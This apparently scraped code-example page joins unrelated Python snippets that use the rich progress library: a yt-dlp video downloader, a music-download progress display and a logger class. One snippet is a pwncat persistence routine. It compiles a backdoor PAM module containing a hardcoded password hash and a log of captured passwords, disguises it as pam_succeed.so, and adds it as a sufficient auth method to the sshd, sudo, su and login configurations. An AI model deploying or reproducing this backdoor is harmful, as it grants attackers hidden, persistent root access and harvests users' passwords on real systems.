            self.writethumbnail,
            'writeinfojson':
            self.writeinfojson,
            'writesubtitles':
            self.writesubtitles,
            'writeautomaticsub':
            self.writeautomaticsub,
            'subtitlesformat':
            'vtt',
            'subtitleslangs': ['en'],
            'cookiefile':
            self.cookies,
            'format':
            "bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best",
            'outtmpl':
            self.f_name,
            'postprocessors': [{
                'key': 'FFmpegMetadata',
                'add_chapters': True,
                'add_metadata': True,
            }, {
                'key': 'FFmpegSubtitlesConvertor',
                'format': 'vtt'
            }],
            'logger':
            MyLogger(),
            'progress_hooks': [self.d_hook]
        }

        if self.headers:
            yt_dlp.utils.std_headers.update(self.headers)

        with yt_dlp.YoutubeDL(ytdl_opts) as ytdl:
            # return ytdl.download_with_info_file(video_url)
            ytdl.add_post_processor(FinishedPP())
            data = ytdl.extract_info(video_url)
            info = json.dumps(ytdl.sanitize_info(data))
            self.data = data
            self.info = info
            return "Download Finished!"

    def downloadEpisode(self, url='', mp4_file='', **kwargs):
        """Downlod Episode into Season Path Folder

        Args:
            url (str):      (Required) - the video title
            mp4_file (str): (Required) - the link of the youtube video

        example:
            from plexarr import youtubedlp

            youtube = youtubedlp()
            youtube.downloadEpisode(video_url=url, mp4_file=mp4_file, format=format_quality)

        """
        # -- settings passed indirectly
        self.video_url = url
        self.f_name = mp4_file
        self.format = "bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best"
        self.headers = False

        # -- settings passed directly
        self.writethumbnail = False
        self.writeinfojson = False
        self.writesubtitles = True
        self.writeautomaticsub = False
        self.subtitlesformat = 'srt'
        self.subtitleslangs = ['en']
        self.__dict__.update(kwargs)

        # -- create fresh directory
        self.folder = Path(self.f_name).parent
        print(f'creating directory: "{self.folder}"')
        print(f'{{"video_url": {self.video_url}}}')
        # os.makedirs(self.folder, exist_ok=True)
        self.folder.mkdir(exist_ok=True)

        # -- Download Movie via yt-dlp -- #
        ytdl_opts = {
            'writethumbnail':
            self.writethumbnail,
            'writeinfojson':
            self.writeinfojson,
            'writesubtitles':
            self.writesubtitles,
            'writeautomaticsub':
            self.writeautomaticsub,
            'subtitlesformat':
            self.subtitlesformat,
            'subtitleslangs':
            self.subtitleslangs,
            'cookiefile':
            self.cookies,
            'format':
            self.format,
            'outtmpl':
            self.f_name,
            'postprocessors': [{
                'key': 'FFmpegMetadata',
                'add_chapters': True,
                'add_metadata': True,
            }, {
                'key': 'FFmpegSubtitlesConvertor',
                'format': self.subtitlesformat
            }],
            'logger':
            MyLogger(),
            'progress_hooks': [self.d_hook]
        }

        if self.headers:
            yt_dlp.utils.std_headers.update(self.headers)

        with yt_dlp.YoutubeDL(ytdl_opts) as ytdl:
            # return ytdl.download_with_info_file(video_url)
            ytdl.add_post_processor(FinishedPP())
            data = ytdl.extract_info(self.video_url)
            info = json.dumps(ytdl.sanitize_info(data))
            self.data = data
            self.info = info
            return "Download Finished!"

    def dVideo(self, title='', video_url='', path='', **kwargs):
        """Downlod youtube video into folder

        Args:
            title (str):     (Required) - the video title
            video_url (str): (Required) - the link of the youtube video
            path (str):      (Required) - the output directory!

        example:
            from plexarr import youtubedlp

            youtube = youtubedlp()
            youtube.downloadvideo(title=title, video_url=url, path=lib_path)

        """
        # -- setting up path configs
        self.title = title
        self.video_url = video_url
        self.path = path
        self.headers = False
        self.writethumbnail = False
        self.writeinfojson = False
        self.writesubtitles = True
        self.writeautomaticsub = False
        self.__dict__.update(kwargs)

        self.title = title
        self.path = path
        self.folder = self.path
        self.f_name = os.path.join(self.path, f'{self.title}.mp4')

        # -- create fresh directory
        print(f'creating directory: "{self.folder}"')
        print(f'{{"video_url": {video_url}}}')
        os.makedirs(self.folder, exist_ok=True)

        ### Download Movie via yt-dlp ###
        ytdl_opts = {
            'writethumbnail':
            self.writethumbnail,
            'writeinfojson':
            self.writeinfojson,
            'writesubtitles':
            self.writesubtitles,
            'writeautomaticsub':
            self.writeautomaticsub,
            'subtitlesformat':
            'vtt',
            'subtitleslangs': ['en'],
            'cookiefile':
            self.cookies,
            'format':
            "bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best",
            'outtmpl':
            self.f_name,
            'postprocessors': [{
                'key': 'FFmpegMetadata',
                'add_chapters': True,
                'add_metadata': True,
            }, {
                'key': 'FFmpegSubtitlesConvertor',
                'format': 'vtt'
            }],
            'logger':
            MyLogger(),
            'progress_hooks': [self.d_hook]
        }

        if self.headers:
            yt_dlp.utils.std_headers.update(self.headers)

        with yt_dlp.YoutubeDL(ytdl_opts) as ytdl:
            # return ytdl.download_with_info_file(video_url)
            ytdl.add_post_processor(FinishedPP())
            data = ytdl.extract_info(video_url)
            info = json.dumps(ytdl.sanitize_info(data))
            self.data = data
            self.info = info
            return "Download Finished!"
コード例 #25
0
    def install(self, user: Optional[str] = None):
        """ Install the persistence method """

        if pwncat.victim.current_user.id != 0:
            raise PersistenceError("must be root")

        try:
            # Enumerate SELinux state
            selinux = pwncat.victim.enumerate.first("system.selinux").data
            # If enabled and enforced, it will block this from working
            if selinux.enabled and "enforc" in selinux.mode:
                raise PersistenceError("selinux is currently in enforce mode")
            elif selinux.enabled:
                # If enabled but permissive, it will log this module
                console.log(
                    "[yellow]warning[/yellow]: selinux is enabled; persistence may be logged"
                )
        except ValueError:
            # SELinux not found
            pass

        # We use the backdoor password. Build the string of encoded bytes
        # These are placed in the source like: char password_hash[] = {0x01, 0x02, 0x03, ...};
        password = hashlib.sha1(
            pwncat.victim.config["backdoor_pass"].encode("utf-8")
        ).digest()
        password = "******".join(hex(c) for c in password)

        # Insert our key
        sneaky_source = self.sneaky_source.replace("__PWNCAT_HASH__", password)

        # Insert the log location for successful passwords
        sneaky_source = sneaky_source.replace("__PWNCAT_LOG__", "/var/log/firstlog")

        progress = Progress(
            "installing pam module",
            "•",
            "[cyan]{task.fields[status]}",
            transient=True,
            console=console,
        )
        task = progress.add_task("", status="initializing")

        # Write the source
        try:
            progress.start()

            progress.update(task, status="compiling shared library")

            try:
                # Compile our source for the remote host
                lib_path = pwncat.victim.compile(
                    [io.StringIO(sneaky_source)],
                    suffix=".so",
                    cflags=["-shared", "-fPIE"],
                    ldflags=["-lcrypto"],
                )
            except (FileNotFoundError, CompilationError) as exc:
                raise PersistenceError(f"pam: compilation failed: {exc}")

            progress.update(task, status="locating pam module installation")

            # Locate the pam_deny.so to know where to place the new module
            pam_modules = "/usr/lib/security"
            try:
                results = (
                    pwncat.victim.run(
                        "find / -name pam_deny.so 2>/dev/null | grep -v 'snap/'"
                    )
                    .strip()
                    .decode("utf-8")
                )
                if results != "":
                    results = results.split("\n")
                    pam_modules = os.path.dirname(results[0])
            except FileNotFoundError:
                pass

            progress.update(task, status=f"pam modules located at {pam_modules}")

            # Ensure the directory exists and is writable
            access = pwncat.victim.access(pam_modules)
            if (Access.DIRECTORY | Access.WRITE) in access:
                # Copy the module to a non-suspicious path
                progress.update(task, status="copying shared library")
                pwncat.victim.env(
                    ["mv", lib_path, os.path.join(pam_modules, "pam_succeed.so")]
                )
                new_line = "auth\tsufficient\tpam_succeed.so\n"

                progress.update(task, status="adding pam auth configuration")

                # Add this auth method to the following pam configurations
                for config in ["sshd", "sudo", "su", "login"]:
                    progress.update(
                        task, status=f"adding pam auth configuration: {config}"
                    )
                    config = os.path.join("/etc/pam.d", config)
                    try:
                        # Read the original content
                        with pwncat.victim.open(config, "r") as filp:
                            content = filp.readlines()
                    except (PermissionError, FileNotFoundError):
                        continue

                    # We need to know if there is a rootok line. If there is,
                    # we should add our line after it to ensure that rootok still
                    # works.
                    contains_rootok = any("pam_rootok" in line for line in content)

                    # Add this auth statement before the first auth statement
                    for i, line in enumerate(content):
                        # We either insert after the rootok line or before the first
                        # auth line, depending on if rootok is present
                        if contains_rootok and "pam_rootok" in line:
                            content.insert(i + 1, new_line)
                        elif not contains_rootok and line.startswith("auth"):
                            content.insert(i, new_line)
                            break
                    else:
                        content.append(new_line)

                    content = "".join(content)

                    try:
                        with pwncat.victim.open(
                            config, "w", length=len(content)
                        ) as filp:
                            filp.write(content)
                    except (PermissionError, FileNotFoundError):
                        continue

                pwncat.victim.tamper.created_file("/var/log/firstlog")

        except FileNotFoundError as exc:
            # A needed binary wasn't found. Clean up whatever we created.
            raise PersistenceError(str(exc))
        finally:
            progress.stop()
コード例 #26
0
class DisplayManager:
    def __init__(self):

        # ! Change color system if "legacy" windows terminal to prevent wrong colors displaying
        self.is_legacy = detect_legacy_windows()

        # ! dumb_terminals automatically handled by rich. Color system is too but it is incorrect
        # ! for legacy windows ... so no color for y'all.
        self.console = Console(
            theme=custom_theme, color_system="truecolor" if not self.is_legacy else None
        )

        self._rich_progress_bar = Progress(
            SizedTextColumn(
                "[white]{task.description}",
                overflow="ellipsis",
                width=int(self.console.width / 3),
            ),
            SizedTextColumn("{task.fields[message]}", width=18, style="nonimportant"),
            BarColumn(bar_width=None, finished_style="green"),
            "[progress.percentage]{task.percentage:>3.0f}%",
            TimeRemainingColumn(),
            console=self.console,
            # ! Normally when you exit the progress context manager (or call stop())
            # ! the last refreshed display remains in the terminal with the cursor on
            # ! the following line. You can also make the progress display disappear on
            # ! exit by setting transient=True on the Progress constructor
            transient=self.is_legacy,
        )

        self.song_count = 0
        self.overall_task_id = None
        self.overall_progress = 0
        self.overall_total = 100
        self.overall_completed_tasks = 0
        self.quiet = False

        # ! Basically a wrapper for rich's: with ... as ...
        self._rich_progress_bar.__enter__()

    def print(self, *text, color="green"):
        """
        `text` : `any`  Text to be printed to screen
        Use this self.print to replace default print().
        """

        if self.quiet:
            return

        line = ""
        for item in text:
            line += str(item) + " "

        if color:
            self._rich_progress_bar.console.print(f"[{color}]{line}")
        else:
            self._rich_progress_bar.console.print(line)

    def set_song_count_to(self, song_count: int) -> None:
        """
        `int` `song_count` : number of songs being downloaded
        RETURNS `~`
        sets the size of the progressbar based on the number of songs in the current
        download set
        """

        # ! all calculations are based of the arbitrary choice that 1 song consists of
        # ! 100 steps/points/iterations
        self.song_count = song_count

        self.overall_total = 100 * song_count

        if self.song_count > 4:
            self.overall_task_id = self._rich_progress_bar.add_task(
                description="Total",
                process_id="0",
                message=f"{self.overall_completed_tasks}/{int(self.overall_total / 100)} complete",
                total=self.overall_total,
                visible=(not self.quiet),
            )

    def update_overall(self):
        """
        Updates the overall progress bar.
        """

        # If the overall progress bar exists
        if self.overall_task_id is not None:
            self._rich_progress_bar.update(
                self.overall_task_id,
                message=f"{self.overall_completed_tasks}/{int(self.overall_total / 100)} complete",
                completed=self.overall_progress,
            )

    def new_progress_tracker(self, songObj):
        """
        returns new instance of `_ProgressTracker` that follows the `songObj` download subprocess
        """
        return _ProgressTracker(self, songObj)

    def close(self) -> None:
        """
        clean up rich
        """

        self._rich_progress_bar.stop()
コード例 #27
0
class RichLogger(object):
    """Defines a logger based on `rich.RichHandler`.

    Compared to the basic Logger, this logger will decorate the log message in
    a pretty format automatically.
    """
    def __init__(self,
                 work_dir=DEFAULT_WORK_DIR,
                 logfile_name='log.txt',
                 logger_name='logger'):
        """Initializes the logger.

        Args:
            work_dir: The work directory. (default: DEFAULT_WORK_DIR)
            logfile_name: Name of the log file. (default: `log.txt`)
            logger_name: Unique name for the logger. (default: `logger`)
        """
        self.logger = logging.getLogger(logger_name)
        if self.logger.hasHandlers():  # Already existed
            raise SystemExit(
                f'Logger `{logger_name}` has already existed!\n'
                f'Please use another name, or otherwise the '
                f'messages from these two logger may be mixed up.')

        self.logger.setLevel(logging.DEBUG)

        # Print log message with `INFO` level or above onto the screen.
        terminal_console = Console(file=sys.stderr,
                                   log_time=False,
                                   log_path=False)
        terminal_handler = RichHandler(level=logging.INFO,
                                       console=terminal_console,
                                       show_time=True,
                                       show_level=True,
                                       show_path=False)
        terminal_handler.setFormatter(logging.Formatter('%(message)s'))
        self.logger.addHandler(terminal_handler)

        # Save log message with all levels into log file if needed.
        if logfile_name:
            os.makedirs(work_dir, exist_ok=True)
            file_stream = open(os.path.join(work_dir, logfile_name), 'a')
            file_console = Console(file=file_stream,
                                   log_time=False,
                                   log_path=False)
            file_handler = RichHandler(level=logging.DEBUG,
                                       console=file_console,
                                       show_time=True,
                                       show_level=True,
                                       show_path=False)
            file_handler.setFormatter(logging.Formatter('%(message)s'))
            self.logger.addHandler(file_handler)

        self.log = self.logger.log
        self.debug = self.logger.debug
        self.info = self.logger.info
        self.warning = self.logger.warning
        self.error = self.logger.error
        self.exception = self.logger.exception
        self.critical = self.logger.critical

        self.pbar = None

    def print(self, *messages, **kwargs):
        """Prints messages without time stamp or log level."""
        for handler in self.logger.handlers:
            handler.console.print(*messages, **kwargs)

    def init_pbar(self, leave=False):
        """Initializes a progress bar which will display on the screen only.

        Args:
            leave: Whether to leave the trace. (default: False)
        """
        assert self.pbar is None

        # Columns shown in the progress bar.
        columns = (
            TextColumn("[progress.description]{task.description}"),
            BarColumn(bar_width=None),
            TextColumn("[progress.percentage]{task.percentage:>5.1f}%"),
            TimeColumn(),
        )

        self.pbar = Progress(*columns,
                             console=self.logger.handlers[0].console,
                             transient=not leave,
                             auto_refresh=True,
                             refresh_per_second=10)
        self.pbar.start()

    def add_pbar_task(self, name, total):
        """Adds a task to the progress bar.

        Args:
            name: Name of the new task.
            total: Total number of steps (samples) contained in the task.

        Returns:
            The task ID.
        """
        assert isinstance(self.pbar, Progress)
        task_id = self.pbar.add_task(name, total=total)
        return task_id

    def update_pbar(self, task_id, advance=1):
        """Updates a certain task in the progress bar.

        Args:
            task_id: ID of the task to update.
            advance: Number of steps advanced onto the target task. (default: 1)
        """
        assert isinstance(self.pbar, Progress)
        if self.pbar.tasks[int(task_id)].finished:
            if self.pbar.tasks[int(task_id)].stop_time is None:
                self.pbar.stop_task(task_id)
        else:
            self.pbar.update(task_id, advance=advance)

    def close_pbar(self):
        """Closes the progress bar"""
        assert isinstance(self.pbar, Progress)
        self.pbar.stop()
        self.pbar = None